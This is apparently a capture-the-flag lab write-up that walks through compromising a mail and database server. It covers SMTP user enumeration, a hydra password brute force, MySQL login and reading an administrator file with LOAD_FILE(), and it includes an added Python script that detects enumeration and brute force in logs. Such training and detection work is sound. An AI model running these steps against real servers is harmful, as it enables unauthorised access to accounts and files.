Attacking Common Services - Easy Lab
We were commissioned by Inlanefreight to conduct a penetration test on three different hosts to evaluate their security configurations. Our task was to identify vulnerabilities and locate a flag placed on each server to verify successful access. The flags have the format: HTB{...}
In this post, we will review the security of the first server, which is responsible for managing emails, customer data, and files.
Task
Assess the target server at the domain inlanefreight.htb and obtain the contents of the flag.txt file. Submit the flag as your answer.
Solution Steps:
Update /etc/hosts
Add the target IP and domain to the /etc/hosts file to facilitate easier access:
echo "10.129.xxx.xx inlanefreight.htb" | sudo tee -a /etc/hosts
Enumerate the Target
Perform a service scan on the target to identify open ports and services:
nmap -sV 10.129.xxx.xxx -Pn
Results:
21/tcp open ftp
25/tcp open smtp hMailServer smtpd
80/tcp open http Apache httpd 2.4.53 ((Win64) OpenSSL/1.1.1n PHP/7.4.29)
443/tcp open https?
587/tcp open smtp hMailServer smtpd
3306/tcp open mysql MySQL 5.5.5-10.4.24-MariaDB
3389/tcp open ms-wbt-server Microsoft Terminal Services
Find Valid Users
Use smtp-user-enum to identify valid SMTP users:
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.xxx.xx
Results:
Starting smtp-user-enum v1.2 (http://pentestmonkey.net/tools/smtp-user-enum)
Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... userlist.txt
Target count ............. 1
Username count ........... 79
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb
######## Scan started at Wed Aug 7 06:27:03 2024 #########
10.129.203.7: f****@inlanefreight.htb exists
######## Scan completed at Wed Aug 7 06:27:51 2024 #########
1 result found: **f****@inlanefreight.htb**
Brute-Force the Password
Use hydra to brute-force the password for the identified user:
hydra -l f****@inlanefreight.htb -P /usr/share/wordlists/rockyou.txt.gz -t 64 -f 10.129.xxx.xx smtp
Results:
login: f****@inlanefreight.htb password: 9********
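Both of the steps above (RCPT-mode user enumeration and the SMTP password attack) leave a distinctive trail in the mail server's log: one client producing many 5xx rejections in a short window. The following detection script is an added example written for this post, not part of the lab or any hMailServer tooling; it runs over constructed log lines in a simplified "timestamp ip command argument code" format (hMailServer's real log format differs) and flags clients that exceed a failure threshold inside a sliding time window.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log format for this example (NOT hMailServer's real format):
#   "<date> <time> <client-ip> <RCPT|AUTH> <argument> <smtp-reply-code>"
LINE_RE = re.compile(r"^(\S+ \S+) (\S+) (RCPT|AUTH) \S+ (\d{3})")


def detect_smtp_abuse(log_lines, window_seconds=60, threshold=5):
    """Return {client_ip: sorted list of alert kinds} for clients that produce
    `threshold` or more 5xx replies to RCPT TO (user enumeration) or to AUTH
    (password guessing) within any `window_seconds` sliding window."""
    recent = defaultdict(deque)   # (ip, command) -> timestamps of recent failures
    alerts = defaultdict(set)
    for line in log_lines:
        m = LINE_RE.match(line)
        if not m:
            continue                      # skip lines we do not understand
        ts_raw, ip, cmd, code = m.groups()
        if not code.startswith("5"):
            continue                      # only permanent failures count
        ts = datetime.strptime(ts_raw, "%Y-%m-%d %H:%M:%S")
        q = recent[(ip, cmd)]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_seconds:
            q.popleft()                   # drop failures outside the window
        if len(q) >= threshold:
            alerts[ip].add("rcpt_enumeration" if cmd == "RCPT" else "auth_bruteforce")
    return {ip: sorted(kinds) for ip, kinds in alerts.items()}


# Constructed sample: 10.10.14.5 (hypothetical scanner) probes six mailboxes,
# hits one valid one, then fails AUTH six times; 10.10.14.9 is a normal client.
SAMPLE_LOG = (
    [f"2024-08-07 06:27:{s:02d} 10.10.14.5 RCPT TO:<user{s}@inlanefreight.htb> 550"
     for s in range(3, 9)]
    + ["2024-08-07 06:27:09 10.10.14.5 RCPT TO:<mailbox@inlanefreight.htb> 250"]
    + [f"2024-08-07 06:30:{s:02d} 10.10.14.5 AUTH LOGIN 535" for s in range(0, 6)]
    + ["2024-08-07 06:31:00 10.10.14.9 RCPT TO:<typo@inlanefreight.htb> 550",
       "2024-08-07 06:31:01 10.10.14.9 RCPT TO:<bob@inlanefreight.htb> 250"]
)

if __name__ == "__main__":
    for ip, kinds in detect_smtp_abuse(SAMPLE_LOG).items():
        print(f"ALERT {ip}: {', '.join(kinds)}")
```

The single rejection from 10.10.14.9 stays below the threshold, so only the scanning client is reported; tune `threshold` and `window_seconds` to the normal typo rate of your own server before alerting on it.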
Connect to MySQL
Log into the MySQL server using the credentials obtained:
mysql -u f**** -p9******** -h 10.129.xxx.xx
To read a local file through MySQL, we use the LOAD_FILE() command from the module's cheat sheet:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 11
Server version: 10.4.24-MariaDB [mariadb.org] binary distribution
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> SELECT LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt");
+------------------------------------------------------+
| LOAD_FILE("C:/Users/Administrator/Desktop/flag.txt") |
+------------------------------------------------------+
| HTB{t*3_4r3_tw0_t0_93t_fl49} |
+------------------------------------------------------+
1 row in set (0.070 sec)
Happy Hunting!
By following these steps, we successfully identified a valid SMTP user, brute-forced their password, and accessed the MySQL database to retrieve the flag. This demonstrates a straightforward approach to assessing the security of email and database services.